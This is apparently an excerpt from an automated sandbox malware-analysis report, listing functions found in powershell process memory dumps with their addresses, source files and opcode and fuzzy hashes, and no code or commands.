                                                                        • Opcode Fuzzy Hash: 549500f5e231df5f7979fd087abac2bd02c53f267755615b8cf5269babbfe421
                                                                        • Instruction Fuzzy Hash: 1002B1B0B00285DFDB14CBA8C454BAEFBE2AFC5314F158469E905AB755CB72EC41CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07DD2818 Relevance: .5, Instructions: 454COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 464c1b9228fab96432c8e921e0e4b8edb5bdbb21246d1dd8de00f899b1836a1b
                                                                        • Instruction ID: 8b6471df20abaab26dd12e9e62af369629e38a847f761e238ff3920f07cf28b6
                                                                        • Opcode Fuzzy Hash: 464c1b9228fab96432c8e921e0e4b8edb5bdbb21246d1dd8de00f899b1836a1b
                                                                        • Instruction Fuzzy Hash: CAE11771B04246CFDB258B68C8106AAFFB2BFC6310F1480ABD545CB296DB75ED41C7A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07DDC611 Relevance: .4, Instructions: 397COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3c25bf786fbdc75249e03541246984441688eddccf0cf78ecfc8b8661a32d082
                                                                        • Instruction ID: b4064e17a7bf52fa7a07c46ad3b082dec6320dfd159aa37743b8204a4da21612
                                                                        • Opcode Fuzzy Hash: 3c25bf786fbdc75249e03541246984441688eddccf0cf78ecfc8b8661a32d082
                                                                        • Instruction Fuzzy Hash: 52021CB4A00215DFDB64DB54C954BADBBB2AF84304F1081E9E909AB741CB75EEC1CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07DD62AB Relevance: .4, Instructions: 387COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ee750842f1818256037458fa1e093d3ca37b19f4935de4c3c7649361e483a962
                                                                        • Instruction ID: b10861eaa3876a17d59b581b6a6b805536265fe2c95f8666a38ffa5d86e4463d
                                                                        • Opcode Fuzzy Hash: ee750842f1818256037458fa1e093d3ca37b19f4935de4c3c7649361e483a962
                                                                        • Instruction Fuzzy Hash: 5DF1A2B4A00215DFEB64DB68C854F6ABBB3AFC4340F1580A9D5096B795CF71EC818F92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07DDB900 Relevance: .4, Instructions: 363COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3dadde4fff462416c1ad3e273e1bf02e02bbd5001c0b8a71fcd783664dcf887f
                                                                        • Instruction ID: 589ffd15f7f7bcaa6535b04ad099c91bf5479e0b292d417dbec47f4bcc044ebe
                                                                        • Opcode Fuzzy Hash: 3dadde4fff462416c1ad3e273e1bf02e02bbd5001c0b8a71fcd783664dcf887f
                                                                        • Instruction Fuzzy Hash: 88E171B0A002159FDB54DB68C854BAEBBB2AFC4704F1080A9E9096F791CB75ED818F95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04F63670 Relevance: .3, Instructions: 314COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f2852e5cb7b7d9d7e238bf1907935638fc50db1b5d0e1a246818e8dad7c0b1fa
                                                                        • Instruction ID: ea8249abf2fc2565462bec8e1a7a9ae4b0fc4e713420b728033613e674a7ba7c
                                                                        • Opcode Fuzzy Hash: f2852e5cb7b7d9d7e238bf1907935638fc50db1b5d0e1a246818e8dad7c0b1fa
                                                                        • Instruction Fuzzy Hash: 3ED1E474E05249DFDB05CFA8D484A9DFBB2EF89310F248159E819AB365C731ED86CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07DD70E7 Relevance: .3, Instructions: 290COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: adf94760547c26fc0b9591e2e9e3a759498b2dbb612a9d1236e9b514b70e9fd8
                                                                        • Instruction ID: 1068f4647f58af8f0e32de19f4919bddf20263128e397125c56c677f54826796
                                                                        • Opcode Fuzzy Hash: adf94760547c26fc0b9591e2e9e3a759498b2dbb612a9d1236e9b514b70e9fd8
                                                                        • Instruction Fuzzy Hash: 83B1A1B0B00205DBDB14DBA8C454BAEFBA3AFC4714F218069D9016F755CF76EC468B96
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07DD7028 Relevance: .3, Instructions: 284COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 86847e83f81889454738c951dfdd38e5dc839c158731cd9f44303ad181ec375f
                                                                        • Instruction ID: 06beff4fb72e03cc1a0da031621bf69b152b392c1a626c706a20ae81b8489207
                                                                        • Opcode Fuzzy Hash: 86847e83f81889454738c951dfdd38e5dc839c158731cd9f44303ad181ec375f
                                                                        • Instruction Fuzzy Hash: 2CB17AB4A00205DFDB14CB58C444BAEFBB2EF89724F158199E9016F395CB75EC46CBA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04F6F24C Relevance: .3, Instructions: 277COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 322e2789abbb12ab2ec72d96da5278c8fe3fe484a17ea47bd1f9ed665e74fa3e
                                                                        • Instruction ID: 1657cd39208212297023ba565aae0d49e4fd05c29b418a269c30b6d6ff5c1041
                                                                        • Opcode Fuzzy Hash: 322e2789abbb12ab2ec72d96da5278c8fe3fe484a17ea47bd1f9ed665e74fa3e
                                                                        • Instruction Fuzzy Hash: 89B15D70E00219DFDF10CFA9D8857DEBBF2AF48314F148529D816A7254EB74A846CF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04F68D38 Relevance: .3, Instructions: 266COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 55b1276cb9063e64c75086b75c524308a9d9a2c0de3081b3f506bdd02e8cd1f9
                                                                        • Instruction ID: dbadd4e96b52ef821507091e8503eee037cc80d6b869c0e240c3a296df6608e4
                                                                        • Opcode Fuzzy Hash: 55b1276cb9063e64c75086b75c524308a9d9a2c0de3081b3f506bdd02e8cd1f9
                                                                        • Instruction Fuzzy Hash: E2A17D71F00249DFDB14EFA4D944A9DBBB2FF84304F218159E806AB354DB74AD4ACB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04F6FB1D Relevance: .3, Instructions: 262COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ebe125796c965347f8c6407d87d3d0e2223d4988ed9cf60cbb1334cd3b36cdfb
                                                                        • Instruction ID: 14549834520bbf1b779566fedbe16ed6c8bf7d3bd76688371b5be099dca7049a
                                                                        • Opcode Fuzzy Hash: ebe125796c965347f8c6407d87d3d0e2223d4988ed9cf60cbb1334cd3b36cdfb
                                                                        • Instruction Fuzzy Hash: 13A16E71E0020ACFDB10CFA8E89579DBBF2BF48314F248529D816E7254EB74A946CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04F6A2A0 Relevance: .2, Instructions: 232COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5b088b18e2e6aa111315390a4e8d70417271cdbd006e51a045abf0d1b4bb32ac
                                                                        • Instruction ID: 7c5441066044805940f3a586073e1597816ba6bb33d7a1fb742f02badeecd4da
                                                                        • Opcode Fuzzy Hash: 5b088b18e2e6aa111315390a4e8d70417271cdbd006e51a045abf0d1b4bb32ac
                                                                        • Instruction Fuzzy Hash: 6E816D3590A7D19FC702DB2CC8A55D9BFB0EF0722471A42CBC491DB163D635AC4ACBA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04F62B48 Relevance: .2, Instructions: 219COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6247fdc6ececc4b2556d2f78e4ead3aa46cc7f3702a15411434f793832fa0cd2
                                                                        • Instruction ID: 68d4ac5112c68f000bdb4a8a6fc21ae767bae148a84073a938b05ee830d0c8f3
                                                                        • Opcode Fuzzy Hash: 6247fdc6ececc4b2556d2f78e4ead3aa46cc7f3702a15411434f793832fa0cd2
                                                                        • Instruction Fuzzy Hash: B191DE74A00205CFCB05CF59C4949AEFBB1FF88310B2586AAD516AB3A5C735FC42CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07DDE454 Relevance: .2, Instructions: 209COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d657c89951f6ab1a151ad2258a2aa5f61483af20b2ed3d3833ab857816edbabf
                                                                        • Instruction ID: 58e0a0bfc9ee1afc086324318e46083a14318c9732bfe6e5c2af3f6c432902b9
                                                                        • Opcode Fuzzy Hash: d657c89951f6ab1a151ad2258a2aa5f61483af20b2ed3d3833ab857816edbabf
                                                                        • Instruction Fuzzy Hash: 118117B4A00205DFDB54CF94C594AA9FBB2AF89724F15C569E804AF355CB32EC81CF61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04F695F6 Relevance: .2, Instructions: 188COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dd4efefdc2cc6c6eb1197278749d5048a3b48d4c451f9089107085a782154058
                                                                        • Instruction ID: 8064a9b4283fad908c9fc14e8c7efe3d670b288bcf0f20aba792b8ef7a6e27e9
                                                                        • Opcode Fuzzy Hash: dd4efefdc2cc6c6eb1197278749d5048a3b48d4c451f9089107085a782154058
                                                                        • Instruction Fuzzy Hash: F8713770A002499FDB18DFA5D894AADBBF2FF88304F148429D402AB790DB75AC46CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04F69488 Relevance: .2, Instructions: 187COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d992d2cfbdffd5967e8dedb58e19f542546c7a3a556827acfd5a7f1318234667
                                                                        • Instruction ID: c24a95452eaab4ef5ea82f95efc619ae43e2325825eee05c5dc04eeae6b68545
                                                                        • Opcode Fuzzy Hash: d992d2cfbdffd5967e8dedb58e19f542546c7a3a556827acfd5a7f1318234667
                                                                        • Instruction Fuzzy Hash: F7718971A00209CFDB15DF68C890A9EBBF2FF84314F54856AD41AAB751DBB4AC46CF80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07DD2F64 Relevance: .2, Instructions: 179COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: da193a8c0ad1d7a623fd3332726ac8792745a09b44d348f8b40afb9f9f3ed842
                                                                        • Instruction ID: e7100a37f051822aeebe7997c8ebb23456a9bb0d2798f9677b68f2788f1d726f
                                                                        • Opcode Fuzzy Hash: da193a8c0ad1d7a623fd3332726ac8792745a09b44d348f8b40afb9f9f3ed842
                                                                        • Instruction Fuzzy Hash: 5A51D67160A382DFC7128B64C8606A6FFB1AF86214F1980DBD5849F293C775DC46C7A3
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04F68604 Relevance: .1, Instructions: 127COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 70dbbed2ffa6800082a0420d772435cd5102d6c7fca55e8ddd6a5a28978c13de
                                                                        • Instruction ID: bd50f8250f0b4f111a1f3879c87f1a5e1456ecddba69becb93a8133aa7bef4b0
                                                                        • Opcode Fuzzy Hash: 70dbbed2ffa6800082a0420d772435cd5102d6c7fca55e8ddd6a5a28978c13de
                                                                        • Instruction Fuzzy Hash: C551E535A02244DFCB15EF64D8809EDBBB2FF49250F1584A9D442AB362CB31EC86DB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04F69229 Relevance: .1, Instructions: 112COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 34a501808ef6c659e5c7cc6c59d2027c4624ab5a75d8d2aade9a54eeb2f4de79
                                                                        • Instruction ID: 6b217ed6ebfd867b86ea58aa1d28ec9e10a60ce184a262d4c8901cdb6ade102e
                                                                        • Opcode Fuzzy Hash: 34a501808ef6c659e5c7cc6c59d2027c4624ab5a75d8d2aade9a54eeb2f4de79
                                                                        • Instruction Fuzzy Hash: 83413A71A002048FDB28DF64D958AAE7BB6FF88754F158468E807EB7A0CB75AC41CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04F69487 Relevance: .1, Instructions: 111COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 287c131829faf72408a1e63785d976177fb79e0133cae4cd2d1c3c280ba7734f
                                                                        • Instruction ID: 7c11f53a09dabb9c19607eba411e8929e2ef7b417d853ee16a5918810594abd5
                                                                        • Opcode Fuzzy Hash: 287c131829faf72408a1e63785d976177fb79e0133cae4cd2d1c3c280ba7734f
                                                                        • Instruction Fuzzy Hash: 54413C70A00218DFDB18DFA9C894A9DBBF2FF84344F54842DD406AB790DBB4AC45CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07DD746E Relevance: .1, Instructions: 102COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 29614cc71cafa82a650175c1146c1cbb37470349e236fa4952656c602b2794aa
                                                                        • Instruction ID: fff9f0188ea501fccd73ee6be7fbd52d8cf770bf38a51846ca001aebff042497
                                                                        • Opcode Fuzzy Hash: 29614cc71cafa82a650175c1146c1cbb37470349e236fa4952656c602b2794aa
                                                                        • Instruction Fuzzy Hash: 5A3185B4B00214DBEB049768C814BAE7BA3AFC5754F10C029E9016F791CF72EC428B96
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07DDE0E8 Relevance: .1, Instructions: 101COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 360c6b5ac15032a10818c147e4b452739f5201eb1ef520980dd896e4af1191c9
                                                                        • Instruction ID: 9951e28394fe53c04fd3794452fb865857e990d5374458f316d0ae6d20a59f8c
                                                                        • Opcode Fuzzy Hash: 360c6b5ac15032a10818c147e4b452739f5201eb1ef520980dd896e4af1191c9
                                                                        • Instruction Fuzzy Hash: 0131F4F1B05206EFDB205A75880077AFBA1AF81A50F5800AAD845DF286EA35CD45CBB6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04F6C418 Relevance: .1, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1dad724fe10e5dd328e21d551ac23d6a7e4fc1279b71fec178e82a8be57c5589
                                                                        • Instruction ID: 7421a8c97ea83707f49584d06f21c6369429f4ed2baef5027a2401f8b21fd2fe
                                                                        • Opcode Fuzzy Hash: 1dad724fe10e5dd328e21d551ac23d6a7e4fc1279b71fec178e82a8be57c5589
                                                                        • Instruction Fuzzy Hash: C7313F30B01158CFCB25DB64C8546EEB7B2AF49304F1144E9D94AAB351DF35AE86CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07DD08C4 Relevance: .1, Instructions: 91COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e46b5cd744fdfacd4436a1fe2ca4ba79aa012e583818c4090660d6e0adbd1aee
                                                                        • Instruction ID: 4dfe7f9378fe2641bdd03834c7f39103c8d545161c8404252280927330387064
                                                                        • Opcode Fuzzy Hash: e46b5cd744fdfacd4436a1fe2ca4ba79aa012e583818c4090660d6e0adbd1aee
                                                                        • Instruction Fuzzy Hash: A531FCF5A04206DFEB204E65C5447BAFBAAEFC4350F19806AD84887156C735DD80C7A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04F6A291 Relevance: .1, Instructions: 84COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a7d993d26e66a1582513cc6d35e8ab3682fd851d58dbd660bf8813c107a66fa7
                                                                        • Instruction ID: bcf00ac6646eb657c998912bec5d7dbcc98a9c1f84310a5121d3f425ba7d3917
                                                                        • Opcode Fuzzy Hash: a7d993d26e66a1582513cc6d35e8ab3682fd851d58dbd660bf8813c107a66fa7
                                                                        • Instruction Fuzzy Hash: F031E475A006099FCB14CF5CC5809AEBBF1FB49310B258699E959AB755C732FC81CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07DD0618 Relevance: .1, Instructions: 66COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2598404025.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_7dd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 12919e6fe424ce1f946a1ccaa548c93c671fe11f681f6529499fd2e9b0a45fcc
                                                                        • Instruction ID: fe040bf43075ff67310e0c01f28cf9bf766f6336034f1abb8640e56da7301446
                                                                        • Opcode Fuzzy Hash: 12919e6fe424ce1f946a1ccaa548c93c671fe11f681f6529499fd2e9b0a45fcc
                                                                        • Instruction Fuzzy Hash: 47118EB53093869FD7128BA49850961FF75AFC2254F1A809BD5848F293E732DC05CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04F631C8 Relevance: .1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6f1e3025cc0e252dd090cfd8ad19029add8238eec50122ca32d7c214db4c17cc
                                                                        • Instruction ID: ef88ce0dcfdc78eff924e660c7b8556972b911dc57cd98fed57cf8b842594904
                                                                        • Opcode Fuzzy Hash: 6f1e3025cc0e252dd090cfd8ad19029add8238eec50122ca32d7c214db4c17cc
                                                                        • Instruction Fuzzy Hash: 98213A74A042199FCB00CF98C4809AABBB5FB89310B14819AD915EB352C635FD42CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04DCD01D Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587204651.0000000004DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DCD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4dcd000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6d7e4f6734f8f4dd9aa7e76a14636350c2afa3e62620155959d810bc11c4c4f7
                                                                        • Instruction ID: 8e03c40a14bd3ab50035f30539dbd1896208298b7adfbc71c0b8b5c404ee54fe
                                                                        • Opcode Fuzzy Hash: 6d7e4f6734f8f4dd9aa7e76a14636350c2afa3e62620155959d810bc11c4c4f7
                                                                        • Instruction Fuzzy Hash: 7B01F272604341DAE7204E29ED80B67BF98EF41364F18C12EED480F242C6B8E842DAB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04DCD005 Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587204651.0000000004DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DCD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4dcd000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fc08fc4a38cf775995496d1f7bec24387183c767ce31d42837c67243c8d29aee
                                                                        • Instruction ID: 5fcc5533928a224af5508ede403bbece333435d04294107f1b4311e623c7fb06
                                                                        • Opcode Fuzzy Hash: fc08fc4a38cf775995496d1f7bec24387183c767ce31d42837c67243c8d29aee
                                                                        • Instruction Fuzzy Hash: C6015E7250E3C09FE7128B259D94B52BFB4EF43224F19C1DBD9888F1A3C2699849C772
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04F631B9 Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.2587929854.0000000004F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_4f60000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 568b2f704f12e61be927641c5dadfc6a8afab589e7f179a88b2f0750306b36a9
                                                                        • Instruction ID: b9bcd870e69622201f1bd2a3e7d49c66d7f9e96446940c8d5f86f562eddadd5e
                                                                        • Opcode Fuzzy Hash: 568b2f704f12e61be927641c5dadfc6a8afab589e7f179a88b2f0750306b36a9
